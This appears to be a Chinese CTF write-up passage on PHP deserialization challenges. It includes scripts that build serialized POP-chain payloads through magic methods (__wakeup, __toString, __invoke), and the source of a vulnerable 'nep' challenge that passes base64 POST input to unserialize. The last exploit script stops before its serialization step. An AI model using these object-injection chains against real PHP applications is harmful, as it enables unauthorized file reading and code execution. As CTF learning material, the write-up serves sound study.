<?php classRead{ public $var="flag.php"; } classShow{ public $source; public $str; } classTest{ public $p; } $r=new Read(); $s=new Show(); $t=new Test(); $t->p=$r;//赋值Test类的对象$t下的属性p为Read类的对象($r),触发__invoke魔术方法 $s->str['str']=$t;//赋值show类的对象($s)下的str数组的str键的值为Test类的对象$t,触发__get魔术方法。 $s->source=$s;//令show类中的对象$s下的source属性进入wake_up函数,这样就会触发tostring魔术方法 echo urlencode((serialize($s)));
nep——梦里花开牡丹亭
跳转战场,回去构造一下nep的题
<?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register;
public $file; public $filename; public $content; public function __construct() { $this->username='user'; $this->password='user'; }
public function __wakeup(){ admin if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){ $this->choice=new login($this->file,$this->filename,$this->content);//新建一个login类 }else{ $this->choice = new register(); } } public function __destruct() { $this->choice->checking($this->username,$this->password); }
} class login{ public $file; public $filename; public $content;
public function __construct($file,$filename,$content) { $this->file=$file; $this->filename=$filename; $this->content=$content; } public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ $this->file->open($this->filename,$this->content); die('login success you can to open shell file!'); } } } class register{ public function checking($username,$password)//这边就会检查了 { if($username==='admin'&&$password==='admin'){ die('success register admin'); }else{ die('please register admin '); } } } class Open{ function open($filename, $content){ if(!file_get_contents('waf.txt')){ shell($content); }else{ echo file_get_contents($filename.".php"); } } } if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){ @unserialize(base64_decode($_POST['unser'])); }
<?php class Game{ public $username; public $password; public $choice; public $register;
public $file; public $filename; public $content; } class login{ } class register{ } class Open{ } $a=new Game; $b=new Open; $a->register="admin"; $a->filename="shell"; $a->file=$b; $a->username="admin"; $a->password="admin";